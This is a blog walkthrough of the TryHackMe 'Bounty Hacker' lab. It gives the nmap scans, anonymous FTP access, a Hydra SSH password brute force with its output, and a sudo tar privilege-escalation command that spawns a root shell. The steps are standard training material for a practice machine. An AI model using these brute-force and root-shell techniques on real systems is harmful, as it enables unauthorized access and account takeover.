Written by Simon

Walk Through for the TryHackMe Bounty Hacker Room

The TryHackMe Bounty Hacker Room is available at https://tryhackme.com/room/cowboyhacker

Reconnaissance

Lets see what is running on this machine. First up is an nmap scan.

sudo nmap -sS -p- -T4 -vv x.x.x.x
  • -sS for Syn/Stealth Scan
  • -p- to scan all 65535 ports
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the following

  • PORT STATE SERVICE REASON
  • 21/tcp open ftp syn-ack ttl 63
  • 22/tcp open ssh syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63

Let’s do a little more investigation on those ports.

sudo nmap -sS -p21,22,80 -sV -T4 -vv 10.10.6.165
  • -sS for Syn/Stealth Scan
  • -p21, 22,80 to only scan ports 22 and 80
  • -sV to find out version information
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the following

  • 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
  • 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  • Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP is running on the machine, so lets see if FTP will let us log in anonymously.

ftp x.x.x.x

Use the login name anonymous and we are in.

Use the get command to download the text files to your system.

The tasks.txt file gives us a possible username and the locks.txt gives us a list of possible passwords.

Password Cracking

With the user name in the tasks.txt file and a list of possible passwords in the locks.txt file, we can try various passwords to connect to the system via SSH using Hydra.

hydra -l user -P locks.txt x.x.x.x ssh

Which gives us the following results

  • Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

  • Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-07 12:15:07

  • [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

  • [WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore

  • [DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task

  • [DATA] attacking ssh://x.x.x.x:22/

  • [22][ssh] host: 10.10.6.165 login: xxx password: xxxxxxxxxxxxxxxxx

  • 1 of 1 target successfully completed, 1 valid password found

  • Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-07 12:15:25

Then we can simply ssh into the server with the login and password

ssh user@x.x.x.x

Privilege Escalation

Now that we are logged in, just use the ls command to find the user.txt flag file.

Being a user is great, but we want to become root, so lets see if we can run any commands with elevated privileges using sudo.

sudo -l

Which gives us the result

  • Matching Defaults entries for lin on bountyhacker:

  • env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

  • User lin may run the following commands on bountyhacker:

  • (root) /bin/tar

So now we now that we can use tar to run as root, a quick visit to the GTFOBins page at https://gtfobins.github.io/ gives us the following command to run.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

And we are root.

Change to the /root/ folder to get the root.txt file. And you have completed the TryHackMe Bounty Hacker room.